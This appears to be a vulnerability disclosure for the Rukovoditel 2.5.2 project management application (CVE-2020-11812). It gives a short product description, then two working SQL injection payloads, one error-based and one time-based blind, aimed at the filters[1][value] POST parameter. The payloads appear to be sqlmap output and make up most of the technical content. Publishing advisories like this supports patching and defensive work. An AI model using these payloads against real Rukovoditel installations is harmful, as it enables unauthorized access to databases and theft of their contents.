Vendor: https://sourceforge.net/projects/rukovoditel/
Version: 2.5.2
Vulnerability: SQL Injection
CVE: CVE-2020-11812
CVSS 3.x Base Score: 9.8 CRITICAL
Rukovoditel is a free web-based open-source project management application. A far cry from traditional applications, Rukovoditel gives users a broader and extensive approach to project management. Its customization options allow users to create additional entities, modify and specify the relationship between them, and generate the necessary reports. The platform enables users to craft their own application that is specifically tailored for their activity (CRM, ERP, HRM, WMS, etc.).
Rukovoditel Version 2.5.2 is affected by SQL injection vulnerability because of improper handling of filters[1][value] parameter.
Payloads,
1
2
3
4
5
6
7
8
9
Parameter: filters[1][value] (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm